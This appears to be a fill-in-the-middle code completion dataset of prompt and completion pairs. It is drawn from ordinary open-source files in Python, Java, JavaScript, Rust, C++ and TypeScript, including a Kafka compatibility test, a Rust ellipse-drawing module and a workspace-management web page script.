prompt
large_stringlengths
70
991k
completion
large_stringlengths
0
1.02k
<|file_name|>hp_httpmanageable_mib.py<|end_file_name|><|fim▁begin|># # Copyright (C) 2015 Uninett AS # # This file is part of Network Administration Visualized (NAV). # # NAV is free software: you can redistribute it and/or modify it under # the terms of the GNU General Public License version 3 as published by # the Free Software Foundation. # # This program is distributed in the hope that it will be useful, but WITHOUT # ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS # FOR A PARTICULAR PURPOSE. See the GNU General Public License for more # details. You should have received a copy of the GNU General Public License # along with NAV. If not, see <http://www.gnu.org/licenses/>. # from twisted.internet import defer from nav.smidumps import get_mib from nav.mibs.mibretriever import MibRetriever class HPHTTPManageableMib(MibRetriever): """HP-httpManageable-MIB (SEMI-MIB) MibRetriever""" mib = get_mib('SEMI-MIB') @defer.inlineCallbacks def get_serial_number(self): """Tries to get a chassis serial number from old HP switches"""<|fim▁hole|> serial = serial.decode("utf-8") defer.returnValue(serial)<|fim▁end|>
serial = yield self.get_next('hpHttpMgSerialNumber') if serial: if isinstance(serial, bytes):
<|file_name|>message_format_change_test.py<|end_file_name|><|fim▁begin|># Copyright 2015 Confluent Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from ducktape.mark import parametrize from ducktape.utils.util import wait_until from kafkatest.services.console_consumer import ConsoleConsumer from kafkatest.services.kafka import KafkaService from kafkatest.services.verifiable_producer import VerifiableProducer from kafkatest.services.zookeeper import ZookeeperService from kafkatest.tests.produce_consume_validate import ProduceConsumeValidateTest from kafkatest.utils import is_int from kafkatest.version import LATEST_0_9, LATEST_0_10, TRUNK, KafkaVersion class MessageFormatChangeTest(ProduceConsumeValidateTest): def __init__(self, test_context): super(MessageFormatChangeTest, self).__init__(test_context=test_context) def setUp(self): self.topic = "test_topic" self.zk = ZookeeperService(self.test_context, num_nodes=1) self.zk.start()<|fim▁hole|> self.producer_throughput = 10000 self.num_producers = 1 self.num_consumers = 1 self.messages_per_producer = 100 def produce_and_consume(self, producer_version, consumer_version, group): self.producer = VerifiableProducer(self.test_context, self.num_producers, self.kafka, self.topic, throughput=self.producer_throughput, message_validator=is_int, version=KafkaVersion(producer_version)) self.consumer = ConsoleConsumer(self.test_context, self.num_consumers, self.kafka, self.topic, new_consumer=False, consumer_timeout_ms=30000, message_validator=is_int, version=KafkaVersion(consumer_version)) self.consumer.group_id = group self.run_produce_consume_validate(lambda: wait_until( lambda: self.producer.each_produced_at_least(self.messages_per_producer) == True, timeout_sec=120, backoff_sec=1, err_msg="Producer did not produce all messages in reasonable amount of time")) @parametrize(producer_version=str(TRUNK), consumer_version=str(TRUNK)) @parametrize(producer_version=str(LATEST_0_9), consumer_version=str(LATEST_0_9)) def test_compatibility(self, producer_version, consumer_version): """ This tests performs the following checks: The workload is a mix of 0.9.x and 0.10.x producers and consumers that produce to and consume from a 0.10.x cluster 1. initially the topic is using message format 0.9.0 2. change the message format version for topic to 0.10.0 on the fly. 3. change the message format version for topic back to 0.9.0 on the fly. - The producers and consumers should not have any issue. - Note that for 0.9.x consumers/producers we only do steps 1 and 2 """ self.kafka = KafkaService(self.test_context, num_nodes=3, zk=self.zk, version=TRUNK, topics={self.topic: { "partitions": 3, "replication-factor": 3, 'configs': {"min.insync.replicas": 2}}}) self.kafka.start() self.logger.info("First format change to 0.9.0") self.kafka.alter_message_format(self.topic, str(LATEST_0_9)) self.produce_and_consume(producer_version, consumer_version, "group1") self.logger.info("Second format change to 0.10.0") self.kafka.alter_message_format(self.topic, str(LATEST_0_10)) self.produce_and_consume(producer_version, consumer_version, "group2") if producer_version == str(TRUNK) and consumer_version == str(TRUNK): self.logger.info("Third format change back to 0.9.0") self.kafka.alter_message_format(self.topic, str(LATEST_0_9)) self.produce_and_consume(producer_version, consumer_version, "group3")<|fim▁end|>
# Producer and consumer
<|file_name|>hwiOperation.py<|end_file_name|><|fim▁begin|><|fim▁hole|>class LedOperation(Operation): opcodes = {"but": "1111100"} structure = [Opcodes(opcodes), Zero(21), Register] class ButOperation(Operation): opcodes = {"led": "1111101"} structure = [Opcodes(opcodes), Operand2(25)]<|fim▁end|>
from .operation import Operation from ..operands import Register, Operand2, Opcodes, Zero
<|file_name|>GetDischargeSummaries.java<|end_file_name|><|fim▁begin|>package gov.va.medora.mdws.emrsvc; import javax.xml.bind.annotation.XmlAccessType; import javax.xml.bind.annotation.XmlAccessorType; import javax.xml.bind.annotation.XmlRootElement; import javax.xml.bind.annotation.XmlType; /** * <p>Java class for anonymous complex type. * * <p>The following schema fragment specifies the expected content contained within this class. * * <pre> * &lt;complexType> * &lt;complexContent> * &lt;restriction base="{http://www.w3.org/2001/XMLSchema}anyType"> * &lt;sequence> * &lt;element name="fromDate" type="{http://www.w3.org/2001/XMLSchema}string" minOccurs="0"/> * &lt;element name="toDate" type="{http://www.w3.org/2001/XMLSchema}string" minOccurs="0"/> * &lt;element name="nNotes" type="{http://www.w3.org/2001/XMLSchema}int"/> * &lt;/sequence> * &lt;/restriction> * &lt;/complexContent> * &lt;/complexType> * </pre> * * */ @XmlAccessorType(XmlAccessType.FIELD) @XmlType(name = "", propOrder = { "fromDate", "toDate", "nNotes" }) @XmlRootElement(name = "getDischargeSummaries") public class GetDischargeSummaries { protected String fromDate; protected String toDate; protected int nNotes; /** * Gets the value of the fromDate property. * * @return * possible object is * {@link String } * */ public String getFromDate() { return fromDate; } /** * Sets the value of the fromDate property. * * @param value * allowed object is * {@link String } * */ public void setFromDate(String value) { this.fromDate = value; } /** * Gets the value of the toDate property. * * @return * possible object is * {@link String } * */ public String getToDate() { return toDate; } /** * Sets the value of the toDate property. * * @param value * allowed object is * {@link String } * */ public void setToDate(String value) { this.toDate = value; } /** * Gets the value of the nNotes property. * */ public int getNNotes() { return nNotes; } /** * Sets the value of the nNotes property. * */ public void setNNotes(int value) { this.nNotes = value; <|fim▁hole|> }<|fim▁end|>
}
<|file_name|>precomp.cpp<|end_file_name|><|fim▁begin|>////////////////////////////////////////////////////////////////////// // // THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF // ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED // TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A // PARTICULAR PURPOSE.<|fim▁hole|>// // PreComp.cpp // // Stub for vc precompiled header. // ////////////////////////////////////////////////////////////////////// #include "globals.h"<|fim▁end|>
// // Copyright (C) 2003 Microsoft Corporation. All rights reserved.
<|file_name|>cargop.rs<|end_file_name|><|fim▁begin|><|fim▁hole|> extern crate cargopants; fn main() { let mut cargo = cargopants::Client::new(); println!("latest version {:?}", cargo.krate("url").get().unwrap()); println!("krate {:?}", cargo.krate("url").version("0.2.25").get().unwrap()); }<|fim▁end|>
//#![deny(warnings)]
<|file_name|>test_property_delete.py<|end_file_name|><|fim▁begin|>""" Unit tests to ensure that we can call reset_traits/delete on a property trait (regression tests for Github issue #67). """ from traits import _py2to3 from traits.api import Any, HasTraits, Int, Property, TraitError from traits.testing.unittest_tools import unittest class E(HasTraits): a = Property(Any) b = Property(Int) class TestPropertyDelete(unittest.TestCase): def test_property_delete(self): e = E()<|fim▁hole|> with self.assertRaises(TraitError): del e.b def test_property_reset_traits(self): e = E() unresetable = e.reset_traits() _py2to3.assertCountEqual(self, unresetable, ['a', 'b'])<|fim▁end|>
with self.assertRaises(TraitError): del e.a
<|file_name|>main_bak.js<|end_file_name|><|fim▁begin|>/* * Copyright (c) 2012-2015 S-Core Co., Ltd. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ require([ 'common', 'lodash', 'moment', 'async', 'text!resource/add_wsdlg.html', 'text!resource/remove_wsdlg.html' ], function (common, _, moment, async, addDlg, removeDlg) { 'use strict'; /* global webidaFs, webidaApp, webidaAuth, webidaHost: true */ var WORKSPACE_PATH = '.profile/workspace.json'; var WORKSPACE_INFO; //var _menuSettings = $('#menu-settings'); var _wsContents = $('.ws-body'); var _dimming = $('.dimming'); var _uniqId; function _dimmingOn() { _dimming.addClass('active'); } function _dimmingOff() { _dimming.removeClass('active'); } function _checkValidWSFile(cb) { webidaFs.readFile(WORKSPACE_PATH, function (err, data) { if (err) { cb('_checkValidWSFile() - readFile Error: ' + err); } else { var wsMeta = JSON.parse(data); var wsMetaCount = Object.keys(wsMeta).length; _getWSList(function (err, wslist) { if (err) { cb('_checkValidWSFile() - _getWSList Error: ' + err); } else { var wsCount = wslist.length; if (wsMetaCount === wsCount) { cb(null, true); } else { cb(null, false); } } }); } }); } function _launchIDE(domObj) { console.log($(domObj).attr('data-wsname')); var workspace = '?workspace=' + webidaFs.fsid + '/' + domObj.attr('data-wsname'); webidaApp.launchApp('devenv', true, workspace); } function _registerDefaultEvent() { // register dimming cancel event _dimming.on('click', function () { _dimming.removeClass('active'); var addWSDlg = $('.add_wsdlg'); var removeWSDlg = $('.remove_wsdlg'); if (addWSDlg) { addWSDlg.remove(); } if (removeWSDlg) { removeWSDlg.remove(); } }); $('#menu-logo').on('click', function () { webidaApp.launchApp('desktop', false, null); }); // register workspace event $('#menu-ws').on('click', function () { var wswrap = $('.ws-wrap'); var settingwrap = $('.settings-wrap'); if (wswrap.hasClass('acitve')) { settingwrap.removeClass('active'); } else { wswrap.addClass('active'); settingwrap.removeClass('active'); } }); // register setting event $('#menu-settings').on('click', function () { var wswrap = $('.ws-wrap'); var settingwrap = $('.settings-wrap'); if (settingwrap.hasClass('acitve')) { wswrap.removeClass('active'); } else { settingwrap.addClass('active'); wswrap.removeClass('active'); } }); // register logout event $('#menu-logout').on('click', function () { _setLogout(); }); // register workspace add event $('.ws-icon-add').on('click', function () { _addWSList(); }); } // WORKSPACE_PATH 파일이 있는지 없는지 여부 확인 후 없으면 생성. function _initialize() { _registerDefaultEvent(); webidaFs.exists(WORKSPACE_PATH, function (err, exist) { if (err) { console.log('_checkWSFile() - exists Error: ' + err); } if (!exist) { _setWorkspace(function (err) { if (err) { console.log(err); } _renderWSList(); }); } else { _checkValidWSFile(function (err, bool) { if (err) { console.log(err); } else { if (bool) { _renderWSList(); } else { console.log('workspace meta-info is invalid.'); _renderWSList(); } } }); } }); } // WORKSPACE 목록 생성 및 WORKSPACE_PATH에 정보 저장. function _setWorkspace(cb) { webidaFs.list('/', function (err, data) { if (err) { console.log('setWorkspace() - list Error: ' + err); cb(err); } else { var WSList = _.chain(data).filter(function (fileObj) { if (!fileObj.name.match(/^\./) && fileObj.isDirectory) { return true; } }).map(function (fileObj) { return '/' + fileObj.name; }).value(); webidaFs.stat(WSList, function (err, stats) { if (err) { console.log('setWorkspace() - stat Error: ' + err); cb(err); } else { var wsObj = {}; _.forEach(stats, function (fileObj) { fileObj.birth = ''; fileObj.desc = ''; wsObj[fileObj.name] = fileObj; }); webidaFs.writeFile(WORKSPACE_PATH, JSON.stringify(wsObj), function (err) { if (err) { console.log('setWorkspace() - writeFile Error: ' + err); cb(err); } else { cb(null, true); } }); } }); } }); } // 유니크 id 생성. function _genUniuqeId() { _uniqId = _.uniqueId(); return _uniqId; } // 로그아웃 function _setLogout() { webidaAuth.logout(function (err) { if (err) { alert('Failed to logout'); } else { location.href = '//' + webidaHost; } }); } function _getWSList(cb) { webidaFs.list('/', function (err, data) { if (err) { cb(err); } else { var WSList = _.chain(data).filter(function (fileObj) { if (!fileObj.name.match(/^\./) && fileObj.isDirectory) { return true; } }).map(function (fileObj) { return '/' + fileObj.name; }).value(); webidaFs.stat(WSList, function (err, stats) { if (err) { cb(err); } else { cb(null, stats); } }); } }); } // 프로젝트 목록 얻어오기 function _getPJListPath(WSPath, cb) { webidaFs.list(WSPath, function (err, pjList) { if (err) { cb(err); } else { var filteredPJList = _.chain(pjList).filter(function (file) { if (!file.name.match('.workspace') && file.isDirectory) { return true; } }).map(function (file) { return WSPath + '/' + file.name + '/.project/project.json'; }).value(); return cb(null, filteredPJList); } }); } // 프로젝트 목록 그리기 function _renderPJList(domObj) { var ws = domObj.attr('data-wspath'); var wsRow = domObj.parent(); if (wsRow.hasClass('ws-closed')) { wsRow.addClass('ws-opened'); wsRow.removeClass('ws-closed'); wsRow.after('<div class="pj-body" data-id="' + wsRow.attr('data-id') + '"></div>'); var proRow = wsRow.next(); _getPJListPath(ws, function (err, pjPathList) { if (err) { console.log('_renderPJList() - _getPJListPath Error: ' + err); } else { _.forEach(pjPathList, function (pjPath) { webidaFs.exists(pjPath, function (err, exist) { if (err) { console.log('_renderPJList() - exists Error: ' + err); } if (exist) { webidaFs.readFile(pjPath, function (err, data) { if (err) { console.log('_renderPJList() - read Error: ' + err); } else { var projInfo = JSON.parse(data); /* jshint maxlen : 200 */ var template = '<div class="pj-row"">' + '<div class="pj-content">' + '<div class="pj-item pj-arrow"></div>' + '<div class="pj-item pj-name">' + projInfo.name + '</div>' + '<div class="pj-item pj-ltime"></div>' + '<div class="pj-item pj-birth">' + moment(projInfo.created).fromNow() + '</div>' + '<div class="pj-item pj-desc">' + projInfo.description + '</div>' + '</div>' + '<div class="pj-content-icon">' + '</div>' + '</div>'; /* jshint maxlen:120 */ proRow.append(template); } }); } }); }); } }); } else { var projRow = wsRow.next(); if (projRow.hasClass('pj-body') && (projRow.attr('data-id') === wsRow.attr('data-id'))) { projRow.remove(); wsRow.removeClass('ws-opened'); wsRow.addClass('ws-closed'); } } } // 워크스페이스 목록 그리기 function _renderWSList() { if (_wsContents.children.length) { _wsContents.empty(); } webidaFs.readFile(WORKSPACE_PATH, function (err, data) { if (err) { console.log('_renderWSList() - readFile Error: ' + err); } else { var wsObj = JSON.parse(data); WORKSPACE_INFO = wsObj; _.forEach(wsObj, function (ws) { var id = _genUniuqeId(); var birth = ''; var desc = ''; if (ws.birth) { birth = moment(ws.birth).fromNow(); } if (ws.desc) { desc = ws.desc; } /* jshint maxlen : 200 */ var template = '<div class="ws-row ws-closed" data-id="' + id + '">' + '<div class="ws-content" data-wspath="' + ws.path + '">' + '<div class="ws-item ws-arrow"></div>' + '<div class="ws-item ws-name">' + ws.name + '</div>' + '<div class="ws-item ws-ltime">' + moment(ws.mtime).fromNow() + '</div>' + '<div class="ws-item ws-birth">' + birth + '</div>' + '<div class="ws-item ws-desc">' + desc + '</div>' + '</div>' + '<div class="ws-content-icon">' + '<div class="ws-launch">' + '<div class="ws-icon-launch" title="Launch IDE" data-wsname="' + ws.name + '"></div>' + '</div>' + '<div class="ws-delete">' + '<div class="ws-icon-delete" title="Delete Workspace" data-wsname="' + ws.name + '" data-id="' + id + '"></div>' + '</div>' + '</div>' + '</div>'; /* jshint maxlen : 120 */ _wsContents.append(template); }); // register get project event $('.ws-body .ws-content').on('click', function (evt) { var domObj = $(evt.target).parent(); _renderPJList(domObj); }); // register launch event $('.ws-icon-launch').on('click', function (evt) { var domObj = $(evt.target); _launchIDE(domObj); }); $('.ws-icon-delete').on('click', function (evt) { var domObj = $(evt.target); _removeWSList(domObj); }); } }); } function _addWSList() { _dimmingOn(); $('body').append(addDlg); // register dialog close event $('.adddlg_close').on('click', function () { $('.add_wsdlg').remove(); _dimmingOff(); }); // input에 포커스 $('#workspace_name').focus(); $('#workspace_name').on('keyup', function () { var wsname = this.value; if (wsname) { $('#adddlg_message').text(''); } }); // register create workspace event $('#adddlg_confirm').on('click', function (evt) { evt.preventDefault(); var wsname = $('#workspace_name').val(); var wsdesc = $('#workspace_desc').val(); var message = $('#adddlg_message'); if (!wsname) { message.text('Please enter workspace name.'); return; } _getWSList(function (err, wslist) { if (err) { console.log('_addWSList()' + err); } else { var isExist = _.find(wslist, { 'name' : wsname }); if (isExist) { message.text('\'' + wsname + '\' worskpace is already existed.'); return; } else { // create workspace var WS_META_PATH = wsname + '/.workspace'; var WS_META_FILE = WS_META_PATH + '/workspace.json'; async.waterfall([ function (next) { webidaFs.createDirectory(wsname, false, function (err) { if (err) { next('_addWSList() - 1st createDirectory Error:' + err); } else { next(); } }); }, function (next) { webidaFs.createDirectory(WS_META_PATH, false, function (err) { if (err) { next('_addWSList() - 2nd createDirectory Error:' + err); } else { next(); } }); }, function (next) { webidaFs.writeFile(WS_META_FILE, '', function (err) { if (err) { next('_addWSList() - 1st writeFile Error:' + err); } else { next(); } }); }, function (next) { webidaFs.stat([wsname], function (err, stats) { if (err) { next('_addWSList() - stat Error:' + err); } else { stats[0].birth = new Date().toJSON(); stats[0].desc = wsdesc; WORKSPACE_INFO[wsname] = stats[0]; next(); } }); }, function (next) { webidaFs.writeFile(WORKSPACE_PATH, JSON.stringify(WORKSPACE_INFO), function (err) { if (err) { next('_addWSList() - 2nd writeFile Error:' + err); } else { next(); } }); } ], function (err) { if (err) { console.log(err); } else { $('.add_wsdlg').remove(); _dimmingOff(); _renderWSList(); } }); } } }); }); } function _removeWSList(domObj) {<|fim▁hole|> $('.removedlg_close').on('click', function () { $('.remove_wsdlg').remove(); _dimmingOff(); }); var deleteWSname = domObj.attr('data-wsname'); var msg = '<p>This action <strong style="color:#fff">CANNOT</strong> be undone. ' + 'This will delete the <span style="color:#fff; font-weight:bold;">' + deleteWSname + '</span> workspace and projects permanetly.</p>' + '<p>Please type in the name of the workspace to confirm.</p>'; $('.removedlg_warning_text').html(msg); // input에 포커스 $('#workspace_name').focus(); $('#workspace_name').on('keyup', function () { var wsname = this.value; if (wsname) { $('#removedlg_message').text(''); } }); $('#removedlg_confirm').on('click', function (evt) { evt.preventDefault(); var wsname = $('#workspace_name').val(); var message = $('#removedlg_message'); if (!wsname) { message.text('Please enter workspace name.'); return; } else if (wsname !== deleteWSname) { message.text('workspace name doesn\'t match.'); return; } if (WORKSPACE_INFO[deleteWSname]) { delete WORKSPACE_INFO[deleteWSname]; async.waterfall([ function (next) { webidaFs.writeFile(WORKSPACE_PATH, JSON.stringify(WORKSPACE_INFO), function (err) { if (err) { err('_removeWSList() - writeFile Error: ' + err); } else { next(); } }); }, function (next) { webidaFs.delete(deleteWSname, true, function (err) { if (err) { next('_removeWSList() - delete Error:' + err); } else { next(); } }); } ], function (err) { if (err) { console.log(err); } else { var id = domObj.attr('data-id'); var selectorWS = '.ws-row[data-id=' + id + ']'; var selectorProj = '.pj-body[data-id=' + id + ']'; $(selectorWS).remove(); if ($(selectorProj)) { $(selectorProj).remove(); } $('.remove_wsdlg').remove(); _dimmingOff(); } }); } }); } common.getFS(function (exist) { if (exist) { _initialize(); } else { location.href = '//' + webidaHost; } }); });<|fim▁end|>
_dimmingOn(); $('body').append(removeDlg);
<|file_name|>index.d.ts<|end_file_name|><|fim▁begin|>/* * Copyright (c) Microsoft Corporation. All rights reserved. * Licensed under the MIT License. See License.txt in the project root for * license information. * * Code generated by Microsoft (R) AutoRest Code Generator. * Changes may cause incorrect behavior and will be lost if the code is * regenerated. */ /** * @class * Initializes a new instance of the AvailabilitySetUpdateParameters class. * @constructor * @member {object} tags A set of tags. A description about the set of tags. *<|fim▁hole|>export interface AvailabilitySetUpdateParameters { tags: { [propertyName: string]: string }; }<|fim▁end|>
*/
<|file_name|>__init__.py<|end_file_name|><|fim▁begin|>import theano from theano import shared, tensor from blocks.bricks import Feedforward, Activation from blocks.bricks.base import application, lazy from blocks_extras.initialization import PermutationMatrix from blocks_extras.utils import check_valid_permutation from blocks.utils import shared_floatx class FixedPermutation(Feedforward): """Perform a fixed permutation of the input features. Parameters ---------- order : ndarray-like A 1-dimensional container containing a permutation on the integers. dot : bool, optional Whether or not to perform the permutation by matrix multiplication. This may be faster in some circumstances but requires allocation of a permutation matrix. """ @lazy(allocation=['order']) def __init__(self, order, dot=True, **kwargs): self.order = order self._dot = dot super(FixedPermutation, self).__init__(**kwargs) def _allocate(self): self.order = check_valid_permutation(self.order) if self.input_dim != len(self.order): raise ValueError("input_dim does not match length of order " "vector") # No roles assigned here, since these are not learnable parameters. if self._dot: shape = (self.order.shape[0], self.order.shape[0]) self._matrix = shared_floatx( PermutationMatrix(self.order).generate(None, shape)) else: order = self.order.astype('int32') assert order.min() == 0 # Catch highly unlikely downcast issue. self._permutation = shared(order) @property def input_dim(self): return len(self.order) @application(inputs=['input_'], outputs=['output_']) def apply(self, input_):<|fim▁hole|> else: return tensor.take(input_, self._permutation, axis=1) class Softsign(Activation): @application(inputs=['input_'], outputs=['output']) def apply(self, input_): one = tensor.constant(1, dtype=theano.config.floatX) return input_ / (one + abs(input_))<|fim▁end|>
if self._dot: return tensor.dot(input_, self._matrix)
<|file_name|>test_client_authorize.py<|end_file_name|><|fim▁begin|>import collections import json import unittest import responses from requests import HTTPError from mock import patch from batfish import Client from batfish.__about__ import __version__ class TestClientAuthorize(unittest.TestCase): def setUp(self): with patch('batfish.client.read_token_from_conf', return_value=None): self.cli = Client() @responses.activate def test_authorize_error(self): url = "https://api.digitalocean.com/v2/actions" responses.add(responses.GET, url, body='{"error": "something"}', status=500, content_type="application/json") with self.assertRaises(HTTPError): self.cli.authorize("test_token") @responses.activate def test_authorize_unauthorized(self): url = "https://api.digitalocean.com/v2/kura"<|fim▁hole|> body = {'id': "unauthorized", 'message': "Unable to authenticate you."} responses.add(responses.GET, url, body=json.dumps(body), status=401, content_type="application/json") self.cli.authorize("test_token") self.assertEquals(responses.calls[0].response.status_code, 401) @responses.activate def test_authorize_unauthorized(self): url = "https://api.digitalocean.com/v2/actions" responses.add(responses.GET, url, body='{"error": "something"}', status=200, content_type="application/json") auth = self.cli.authorize("test_token") self.assertEquals(auth, "OK") self.assertEquals(responses.calls[0].response.status_code, 200)<|fim▁end|>
<|file_name|>0001_initial.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*- from __future__ import unicode_literals from django.db import models, migrations <|fim▁hole|> operations = [ migrations.CreateModel( name='Prueba', fields=[ ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)), ('nombre', models.CharField(max_length=100)), ], options={ }, bases=(models.Model,), ), ]<|fim▁end|>
class Migration(migrations.Migration): dependencies = [ ]
<|file_name|>ellipse.rs<|end_file_name|><|fim▁begin|>//! Draw ellipse<|fim▁hole|> pub use rectangle::centered; pub use rectangle::centered_square as circle; /// Ellipse border #[derive(Copy, Clone)] pub struct Border { /// The border color pub color: Color, /// The border radius pub radius: Radius, } /// An ellipse with filled color #[derive(Copy, Clone)] pub struct Ellipse { /// The ellipse color pub color: Color, /// The ellipse border pub border: Option<Border>, /// The resolution for the shape, 360 degrees. pub resolution: Resolution, } impl Ellipse { /// Creates a new ellipse pub fn new(color: Color) -> Ellipse { Ellipse { color: color, border: None, resolution: 128, } } /// Creates a new ellipse border pub fn new_border(color: Color, radius: Radius) -> Ellipse { Ellipse { color: [0.0; 4], border: Some(Border { color: color, radius: radius, }), resolution: 128, } } /// Sets ellipse color. pub fn color(mut self, value: Color) -> Self { self.color = value; self } /// Sets ellipse border. pub fn border(mut self, value: Border) -> Self { self.border = Some(value); self } /// Sets optional ellipse border. pub fn maybe_border(mut self, value: Option<Border>) -> Self { self.border = value; self } /// Sets resolution of the ellipse smoothness. pub fn resolution(mut self, value: Resolution) -> Self { self.resolution = value; self } /// Draws ellipse by corners using default method. #[inline(always)] pub fn draw_from_to<P: Into<crate::types::Vec2d>, G>(&self, from: P, to: P, draw_state: &DrawState, transform: Matrix2d, g: &mut G) where G: Graphics { use rectangle::rectangle_by_corners; let from = from.into(); let to = to.into(); g.ellipse(self, rectangle_by_corners(from[0], from[1], to[0], to[1]), draw_state, transform); } /// Draws ellipse using default method. #[inline(always)] pub fn draw<R: Into<Rectangle>, G>(&self, rectangle: R, draw_state: &DrawState, transform: Matrix2d, g: &mut G) where G: Graphics { g.ellipse(self, rectangle, draw_state, transform); } /// Draws ellipse using triangulation. pub fn draw_tri<R: Into<Rectangle>, G>(&self, rectangle: R, draw_state: &DrawState, transform: Matrix2d, g: &mut G) where G: Graphics { let rectangle = rectangle.into(); g.tri_list(draw_state, &self.color, |f| { triangulation::with_ellipse_tri_list(self.resolution, transform, rectangle, |vertices| f(vertices)) }); if let Some(Border { color, radius: border_radius }) = self.border { g.tri_list(&draw_state, &color, |f| { triangulation::with_ellipse_border_tri_list(self.resolution, transform, rectangle, border_radius, |vertices| f(vertices)) }); } } } #[cfg(test)] mod test { use super::*; #[test] fn test_ellipse() { let _ellipse = Ellipse::new([1.0; 4]) .color([0.0; 4]) .border(Border { color: [1.0; 4], radius: 3.0, }); } }<|fim▁end|>
use types::{Color, Radius, Rectangle, Resolution}; use {triangulation, DrawState, Graphics}; use math::Matrix2d;
<|file_name|>0002_auto_20161030_1553.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*- # Generated by Django 1.10.2 on 2016-10-30 12:53 from __future__ import unicode_literals <|fim▁hole|>from django.db import migrations class Migration(migrations.Migration): dependencies = [ ('core', '0001_initial'), ] operations = [ migrations.RemoveField( model_name='user', name='added', ), migrations.RemoveField( model_name='user', name='changed', ), ]<|fim▁end|>
<|file_name|>setup.py<|end_file_name|><|fim▁begin|>from setuptools import setup, find_packages with open('pyluno/meta.py') as f: exec(f.read()) setup( name='pyluno', version=__version__, packages=find_packages(exclude=['tests']), description='A Luno API for Python', author='Cayle Sharrock/Grant Stephens', author_email='[email protected]', scripts=['demo.py'], install_requires=[ 'futures>=3.0.3', 'nose>=1.3.7', 'requests>=2.8.1', 'pandas>=0.17.0', ], license='MIT', url='https://github.com/grantstephens/pyluno', download_url='https://github.com/grantstephens/pyluno/tarball/%s' % (__version__, ), keywords='Luno Bitcoin exchange API', classifiers=[ 'Development Status :: 5 - Production/Stable', 'Intended Audience :: Developers', 'License :: OSI Approved :: MIT License', 'Topic :: Office/Business :: Financial', 'Topic :: Utilities', 'Programming Language :: Python :: 2', 'Programming Language :: Python :: 2.6', 'Programming Language :: Python :: 2.7', 'Programming Language :: Python :: 3', 'Programming Language :: Python :: 3.2', 'Programming Language :: Python :: 3.3', 'Programming Language :: Python :: 3.4', 'Programming Language :: Python :: 3.5', 'Programming Language :: Python :: 3.6', ], test_suite='tests', extras_require={<|fim▁hole|><|fim▁end|>
'test': ['requests-mock>=0.7.0', 'nose'], } )
<|file_name|>build_insert_query.rs<|end_file_name|><|fim▁begin|>extern crate rustorm; extern crate uuid; extern crate chrono; extern crate rustc_serialize; use uuid::Uuid; use rustorm::query::Query; use rustorm::dao::{Dao, IsDao}; use rustorm::pool::ManagedPool; #[derive(Debug, Clone)] pub struct Photo { pub photo_id: Uuid, pub url: Option<String>, } impl IsDao for Photo{ fn from_dao(dao: &Dao) -> Self { Photo { photo_id: dao.get("photo_id"), url: dao.get_opt("url"), } } fn to_dao(&self) -> Dao { let mut dao = Dao::new(); dao.set("photo_id", &self.photo_id); match self.url { Some(ref _value) => dao.set("url", _value), None => dao.set_null("url"), } dao } } #[test] fn test_insert_query() { let url = "postgres://postgres:p0stgr3s@localhost/bazaar_v6"; let pool = ManagedPool::init(&url, 1).unwrap(); let db = pool.connect().unwrap(); let mut query = Query::insert(); query.into_table("bazaar.product") .set("name", &"product1") .returns(vec!["category.name"]); let frag = query.build(db.as_ref());<|fim▁hole|> VALUES ($1 )\x20 RETURNING name ".to_string(); println!("actual: {{\n{}}} [{}]", frag.sql, frag.sql.len()); println!("expected: {{{}}} [{}]", expected, expected.len()); assert!(frag.sql.trim() == expected.trim()); }<|fim▁end|>
let expected = " INSERT INTO bazaar.product( name )\x20
<|file_name|>ListAvatarViewHolder.java<|end_file_name|><|fim▁begin|>package com.michaelfotiadis.crossyscore.ui.components.addplayer.avatar; import android.view.View; import android.widget.ImageView; import com.michaelfotiadis.crossyscore.R; import com.michaelfotiadis.crossyscore.ui.core.common.viewholder.BaseViewHolder;<|fim▁hole|>public final class ListAvatarViewHolder extends BaseViewHolder { private static final int LAYOUT_ID = R.layout.list_item_single_image; @Bind(R.id.image) protected ImageView image; public ListAvatarViewHolder(final View view) { super(view); } public static int getLayoutId() { return LAYOUT_ID; } }<|fim▁end|>
import butterknife.Bind;
<|file_name|>templates.cpp<|end_file_name|><|fim▁begin|><|fim▁hole|> public: void in_base(); }; template<typename T, typename Alloc = std::allocator<T> > class vector : Alloc { public: void foo(); void stop(); }; template<typename Alloc> class vector<bool, Alloc>; } void f() { std::vector<int> v; v.foo(); // RUN: %clang_cc1 -fsyntax-only -code-completion-at=%s:18:8 %s -o - | FileCheck -check-prefix=CHECK-CC1 %s // CHECK-CC1: allocator<<#typename T#>> // CHECK-CC1-NEXT: vector<<#typename T#>{#, <#typename Alloc#>#}> // RUN: %clang_cc1 -fsyntax-only -code-completion-at=%s:19:5 %s -o - | FileCheck -check-prefix=CHECK-CC2 %s // CHECK-CC2: foo // CHECK-CC2: in_base // CHECK-CC2: stop } template <typename> struct X; template <typename T> struct X<T*> { X(double); }; X<int*> x(42); // RUN: %clang_cc1 -fsyntax-only -code-completion-at=%s:32:11 %s -o - | FileCheck -check-prefix=CHECK-CONSTRUCTOR %s // CHECK-CONSTRUCTOR: OVERLOAD: X(<#double#>) // (rather than X<type-parameter-0-0 *>(<#double#>)<|fim▁end|>
namespace std { template<typename T> class allocator {
